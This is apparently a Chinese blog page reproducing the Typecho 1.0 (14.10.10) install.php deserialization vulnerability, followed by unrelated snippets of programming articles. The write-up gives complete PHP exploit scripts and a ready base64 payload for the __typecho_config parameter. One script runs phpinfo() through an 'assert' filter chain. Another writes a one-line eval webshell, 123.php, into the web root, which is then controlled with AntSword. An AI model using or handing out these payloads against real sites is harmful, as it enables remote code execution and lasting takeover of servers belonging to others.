当前位置：首页 > news >正文

【漏洞复现】typecho_v1.0-14.10.10_unserialize

news 2026/2/7 18:03:36

感谢互联网提供分享知识与智慧，在法治的社会里，请遵守有关法律法规

文章目录

- - 漏洞利用
  - - GetShell

下载链接：https://pan.baidu.com/s/1z0w7ret-uXHMuOZpGYDVlw
提取码：lt7a

首页

在这里插入图片描述

漏洞点：/install.php?finish=

漏洞利用

漏洞利用脚本 phpinfo()信息

<?php//typecho_1.0(14.10.10)_unserialize_phpinfo.php
class Typecho_Feed{const RSS1 = 'RSS 1.0';const RSS2 = 'RSS 2.0';const ATOM1 = 'ATOM 1.0';const DATE_RFC822 = 'r';const DATE_W3CDTF = 'c';const EOL = "\n";private $_type;private $_items;public function __construct(){$this->_type = $this::RSS2;$this->_items[0] = array('title' => '1','link' => '1','date' => 1508895132,'category' => array(new Typecho_Request()),'author' => new Typecho_Request(),);}
}class Typecho_Request{private $_params = array();private $_filter = array();public function __construct(){$this->_params['screenName'] = 'phpinfo()';$this->_filter[0] = 'assert';}
}$exp = array('adapter' => new Typecho_Feed(),'prefix' => 'typecho_'
);echo base64_encode(serialize($exp));
?>

在这里插入图片描述

得到base64编码后的结果

YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30

请求体参数是__typecho_config=，上面base64编码后的结果就是该参数的值

在这里插入图片描述

GetShell

payload如下：

<?php//typecho_1.0(14.10.10)_unserialize_GetShell.php
class Typecho_Request
{private $_params = array();private $_filter = array();public function __construct(){$this->_params['screenName'] = 'file_put_contents(\'123.php\',\'<?php @eval($_POST[shell]);?>\')';$this->_filter[0] = 'assert';}
}class Typecho_Feed
{private $_type;private $_items = array();public $dateFormat;public function __construct(){$this->_type = 'ATOM 1.0';$item['author'] = new Typecho_Request();$this->_items[0] = $item;}
}$x = new Typecho_Feed();
$a = array('adapter' => $x,'prefix' => 'typecho_'
);
echo "<pre>";
print_r($a);
echo "</pre>";
echo serialize($a)."<br>";
echo "__typecho_config=".base64_encode(serialize($a));
?>

在这里插入图片描述

http://192.168.80.140/typecho_1.0(14.10.10)/build/install.php?finish=

传递post参数__typecho_config值

在这里插入图片描述

点击执行，返回状态码500

在这里插入图片描述

这个时候在网站的根目录下生成一个123.php一句话木马文件

在这里插入图片描述

浏览器访问一下这个123.php文件

然后使用蚁剑连接

在这里插入图片描述

【漏洞复现】typecho_v1.0-14.10.10_unserialize

感谢互联网提供分享知识与智慧，在法治的社会里，请遵守有关法律法规文章目录漏洞利用GetShell 下载链接：https://pan.baidu.com/s/1z0w7ret-uXHMuOZpGYDVlw 提取码：lt7a 首页漏洞点：/install.php?finish 漏洞利用 …...

编程日记 2023/11/6 17:25:55

Linux常见面试题

1、冯诺依曼体系的要点是： 数字计算机的数制采用二进制，bit 位, byte 字节 1 byte 8 bit计算机应该按照程序顺序执行计算机硬件由运算器、控制器、存储器、输入设备和输出设备五大部分组成 2、计算机的硬件五个组件控制器: 指挥系统运算器: 数学和逻…...

编程日记 2023/11/6 17:24:53

HarmonyOS ArkTS基础知识

概述上一节，学习了TypeScript的基础语法，而在鸿蒙开发当中，有基于自己的编程语言，便是ArkTS。它是一种声明式UI的编程范式的语言，开发框架如下图所示： 根据框架图，分析，我将它大致…...

编程日记 2023/11/6 17:23:50

嵌入式课后习题第一章解答

嵌入式系统是一种以应用为中心，以计算机技术为基础，软/硬件可裁剪，适应应用系统对功能、可靠性、成本、体积、功耗严格要求的专用计算机。它与通用PC的区别主要体现在以下几个方面： 应用针对性：嵌入式系统是专为特定应…...

编程日记 2023/11/6 17:21:48

A:端口3000 import React, { useEffect } from react;function App() {useEffect(() > {const childWindow document.getElementById(child).contentWindow;const sendMessageToChild () > {childWindow.postMessage("主页面消息", "http://localhost:…...

编程日记 2023/11/6 17:20:47

挑战100天 AI In LeetCode Day01（1）

挑战100天 AI In LeetCode Day01（1） 一、LeetCode介绍二、LeetCode 热题 HOT 100-12.1 题目2.2 题解三、面试经典 150 题-13.1 题目3.2 题解一、LeetCode介绍 LeetCode是一个在线编程网站，提供各种算法和数据结构的题目，面向程序…...

编程日记 2023/11/6 17:19:47

大数据疫情分析及可视化系统计算机竞赛

文章目录 0 前言2 开发简介3 数据集4 实现技术4.1 系统架构4.2 开发环境4.3 疫情地图4.3.1 填充图(Choropleth maps)4.3.2 气泡图 4.4 全国疫情实时追踪4.6 其他页面 5 关键代码最后 0 前言 🔥 优质竞赛项目系列，今天要分享的是 🚩 大数据疫…...

编程日记 2023/11/6 17:17:44

uniapp调起拨打手机号

您可以使用uniapp提供的API来调起拨打手机号的功能。具体步骤如下： 在template标签内添加一个按钮，例如： <template><view><button type"primary" click"callPhone">拨打客服电话</button><…...

编程日记 2023/11/6 17:16:43

nacos配置中心docker部署、配置及 goLang 集成使用

为什么需要配置中心平时我们写一个demo的时候，或者说一个单体的应用，都会有一个配置文件，不管是 json文件或者yaml文件，里面包含了redis,mysql,es等信息，如果我们修改了配置文件，往往我们需要重启&#x…...

编程日记 2023/11/6 17:15:42

PubDef：使用公共模型防御迁移攻击

对抗性攻击对机器学习系统的可靠性和安全性构成了严重威胁。通过对输入进行微小的变动，攻击者就可以导致模型生成完全错误的输出。防御这种攻击是一个很活跃的研究领域，但大多数提议的防御措施都存在重大的缺点。这篇来自加州大学伯克利分校研究人员的…...

编程日记 2023/11/6 17:14:41

【QT5之QFtp模块】编译及使用

下载传送门：https://github.com/qt/qtftp 或者 git clone https://github.com/qt/qtftp.git 下载ZIP，解压待用。编辑使用QtCreator打开qtftp.pro; 修改如下： qtftp.pro中，将第21行注释; src/qftp.pro中，将第4行…...

编程日记 2023/11/6 17:13:40

数据结构编程1年新手视角的平衡二叉树AVL从C与C++实现②

接下来，是数据的插入我们需要对数据插入的结点先进行判断，有如下三个情况当插入的数据value<结点的value，应该递归地插入该结点的左子树（的左子树...的左子树） 当插入的数据value>结点的value，应…...

编程日记 2023/11/6 17:12:39

代码随想录二刷Day 59

647. 回文子串这个题的dp定义想不到，递推公式也想不到但是看题解都很容易理解，遍历顺序不太好理解。 class Solution { public:int countSubstrings(string s) {vector<vector<bool>> dp(s.size(), vector<bool>(s.size(), false)…...

编程日记 2023/11/6 17:11:35

由一个自动化脚本运维展开的思考

今天分享一个思路，如何通过脚本集中管理程序的启停。减少人工的介入。例子好的，这里有一个基本的shell脚本示例，你可以根据你的具体需求进行修改。启动脚本（start.sh）： #!/bin/bash ./test_server_1…...

编程日记 2023/11/6 17:10:34

STM32F103C8T6第二天：按键点灯轮询法和中断法、RCC、电动车报警器（振动传感器、继电器、喇叭、433M无线接收发射模块）

1. 点亮LED灯详解（307.11） 标号一样的导线在物理上是连接在一起的。将 PB8 或 PB9 拉低，就可以实现将对应的 LED 灯点亮。常用的GPIO HAL库函数： void HAL_GPIO_Init(GPIO_TypeDef *GPIOx, GPIO_InitTypeDef *GPIO_Init);//I/…...

编程日记 2023/11/6 17:05:29

路由器基础（九）：防火墙基础

防火墙 (Fire Wall) 是网络关联的重要设备，用于控制网络之间的通信。外部网络用户的访问必须先经过安全策略过滤，而内部网络用户对外部网络的访问则无须过滤。现在的防火墙还具有隔离网络、提供代理服务、流量控制等功能。一、三种防火墙技术常见的…...

编程日记 2023/11/6 17:03:26

免费(daoban)gpt，同时去除广告

一. 内容简介免费(daoban)gpt，同时去除广告，https://chat18.aichatos.xyz/，也可当gpt用，就是有点广告，大家也可以支持一下二. 软件环境 2.1 Tampermonkey 三.主要流程 3.1 创建javascript脚本点击添加新脚本 …...

编程日记 2023/11/6 17:02:23

如何使用Plex在Windows系统上搭建一个全能私人媒体影音站点

文章目录 1.前言2. Plex网站搭建2.1 Plex下载和安装2.2 Plex网页测试2.3 cpolar的安装和注册 3. 本地网页发布3.1 Cpolar云端设置3.2 Cpolar本地设置 4. 公网访问测试5. 结语 1.前言用手机或者平板电脑看视频，已经算是生活中稀松平常的场景了，特别是各…...

编程日记 2023/11/6 17:01:22

vue如何实现视频全屏切换

最近项目开发中遇到一个视频窗口全屏切换功能，为此在这里做个记录。具体的实现思路： <template><div class"content-box"><div class"container"><div id"screen" class"screen"><…...

编程日记 2023/11/6 17:00:22

Shopee买家通系统一款全自动操作虾皮买家号的软件

Shopee买家通系统可以全自动批量注册虾皮买家号，注册时可以自动调用手机号、自动接收短信验证、自动绑地址及支付卡，注册成功后还能自动绑定邮箱进行验证。软件支持5个国家使用，越南、泰国、菲律宾、印度尼西亚、马来西亚。内置防指纹技术 …...

编程日记 2023/11/6 16:59:21

(LeetCode 每日一题) 3442. 奇偶频次间的最大差值 I (哈希、字符串)

题目：3442. 奇偶频次间的最大差值 I 思路 ：哈希，时间复杂度0(n)。用哈希表来记录每个字符串中字符的分布情况，哈希表这里用数组即可实现。 C版本： class Solution { public:int maxDifference(string s) {int a[26]…...

编程新知 2026/2/6 3:08:59

Qt/C++开发监控GB28181系统/取流协议/同时支持udp/tcp被动/tcp主动

一、前言说明在2011版本的gb28181协议中，拉取视频流只要求udp方式，从2016开始要求新增支持tcp被动和tcp主动两种方式，udp理论上会丢包的，所以实际使用过程可能会出现画面花屏的情况，而tcp肯定不丢包，起码…...

编程新知 2026/2/5 4:23:49

【Oracle APEX开发小技巧12】

有如下需求： 有一个问题反馈页面，要实现在apex页面展示能直观看到反馈时间超过7天未处理的数据，方便管理员及时处理反馈。我的方法：直接将逻辑写在SQL中，这样可以直接在页面展示完整代码： SELECTSF.FE…...

编程新知 2026/2/7 17:35:15

盘古信息PCB行业解决方案：以全域场景重构，激活智造新未来

一、破局：PCB行业的时代之问在数字经济蓬勃发展的浪潮中，PCB（印制电路板）作为 “电子产品之母”，其重要性愈发凸显。随着 5G、人工智能等新兴技术的加速渗透，PCB行业面临着前所未有的挑战与机遇。产品迭代…...

编程新知 2026/2/7 17:29:24

模型参数、模型存储精度、参数与显存

模型参数量衡量单位 M：百万（Million） B：十亿（Billion） 1 B 1000 M 1B 1000M 1B1000M 参数存储精度模型参数是固定的，但是一个参数所表示多少字节不一定，需要看这个参数以什么…...

编程新知 2025/12/20 12:32:08

通过Wrangler CLI在worker中创建数据库和表

官方使用文档：Getting started Cloudflare D1 docs 创建数据库在命令行中执行完成之后，会在本地和远程创建数据库： npx wranglerlatest d1 create prod-d1-tutorial 在cf中就可以看到数据库： 现在，您的Cloudfla…...

编程新知 2026/1/31 6:18:08

在四层代理中还原真实客户端ngx_stream_realip_module

一、模块原理与价值 PROXY Protocol 回溯第三方负载均衡（如 HAProxy、AWS NLB、阿里 SLB）发起上游连接时，将真实客户端 IP/Port 写入 PROXY Protocol v1/v2 头。Stream 层接收到头部后，ngx_stream_realip_module 从中提取原始信息…...

编程新知 2026/1/4 5:02:00